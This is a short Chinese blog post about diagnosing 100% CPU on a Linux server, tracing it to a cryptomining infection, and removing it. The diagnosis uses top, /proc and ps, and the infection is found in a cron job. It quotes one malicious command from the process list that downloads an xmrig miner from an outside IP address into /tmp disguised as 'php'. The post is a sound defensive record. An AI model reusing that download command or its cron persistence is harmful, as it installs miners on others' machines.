linux一次进程cpu100记录

最近遇到一个问题,发现导致经常cpu爆满,导致tomcat,nginx等出现异常。

1、查看异常进程

top命令

2、查看PID对应的文件

ll /proc/PID/exe

3、通过ps命令得知文件来源

ps -ef | grep php

nobody   11036 10981  0 11:28 ?        00:00:00 wget -O /tmp/php http://91.201.42.5/xmrig_64?19517

4、由此知道是由wget 下载xmrig_64 这个文件生成了php这个病毒文件,百度之后发现是挖矿病毒,删除后还会自动生成。查找定时任务

ls /var/spool/cron

发现下面有一个nobody的文件,vi打开正是下载的东西,删除之后解决

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值